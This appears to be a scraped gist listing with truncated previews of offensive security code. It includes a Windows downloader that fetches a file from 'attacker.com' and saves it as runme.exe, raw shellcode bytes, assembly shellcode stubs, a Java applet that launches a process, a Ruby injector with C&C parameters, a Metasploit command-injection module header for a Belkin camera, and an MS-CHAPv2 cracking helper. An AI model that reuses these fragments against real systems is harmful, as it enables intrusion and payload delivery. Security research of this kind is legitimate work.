This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#define WIN32_LEAN_AND_MEAN | |
#include <windows.h> | |
#include <urlmon.h> | |
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpszCmdLine, int nCmdShow) { | |
const char szFilename[] = "runme.exe"; | |
const char szDownloadUrl[] = "http://attacker.com/file.jpg"; | |
while(1) { | |
if (URLDownloadToFile(NULL, szDownloadUrl, szFilename, BINDF_GETNEWESTVERSION, NULL) == S_OK) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env ruby | |
def b32_to_i(bin_arr) | |
val = 0; bin_arr.each_with_index { |b,i| val += b*(2**(31-i)) }; val | |
end | |
def i_to_b32(num) | |
val = 31.downto(0).each.map { |i| num[i] } | |
end |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/ruby | |
require 'digest/sha1' | |
if !ARGV[0] || !ARGV[1] | |
puts "Usage: accgen.rb <john-style-passfile.txt> <mschapv2acc-bin-output>" | |
puts "" | |
puts "Takes a John-sytle passwd file as input, separated as follows:" | |
puts "username:::AUTH_HASH:RESPONSE_HASH:PEER_HASH" | |
puts "The output file is ready for mschapv2acc cracking." | |
puts "" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#define WIN32_LEAN_AND_MEAN | |
#include "Windows.h" | |
BYTE shellcode[] = | |
"\xfc\x89\xe6\x81\xec\x00\x20\x00\x00\xe8\x89\x00\x00\x00\x60\x89" | |
"\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28" | |
"\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1" | |
"\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" | |
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20" | |
"\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import java.io.*; | |
import java.net.*; | |
import java.applet.*; | |
public class Plugin extends Applet { | |
public void init() { | |
Process f; | |
try { | |
java.io.BufferedInputStream in = new java.io.BufferedInputStream(new |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
require 'win32/pipe' | |
require 'timeout' | |
require 'injector' | |
def update_https_code(cnc_host, url, params, pipe) | |
pipe = "\\\\.\\pipe\\#{pipe}" | |
url = "#{url}\x00\x00\x00\x00\x00\x00" if url.length < 6 | |
params = "\x00" if params.empty? | |
pipe_offset = (@https_pipe_code =~ /\\\\\.\\pipe\\fooo/) | |
url_offset = (@https_pipe_code =~ /\/12345/) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
%define u(x) __utf16__(x) | |
[BITS 32] | |
[ORG 0] | |
cld | |
mov esi, esp ; ESI points to the current postion of the stack (for ref local var) | |
sub esp, 0x2000 ; Alloc some space on stack | |
call start | |
delta: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
%define u(x) __utf16__(x) | |
[BITS 64] | |
[ORG 0] | |
cld ; Clear the direction flag. | |
and rsp, 0xFFFFFFFFFFFFFFF0 ; Ensure RSP is 16 byte aligned | |
mov rsi, rsp ; ESI points to the current postion of the stack (for ref local var) | |
sub rsp, 0x2000 ; Allocate some stack space | |
call start ; Call start, this pushes the address of 'api_call' onto the stack. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
require 'msf/core' | |
class Metasploit3 < Msf::Exploit::Remote | |
Rank = ExcellentRanking | |
include Msf::Exploit::Remote::HttpClient | |
def initialize(info={}) | |
super(update_info(info, | |
'Name' => "Belkin Netcam HD UPnP Command Injection", |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
echo "I am an evil backdoor" |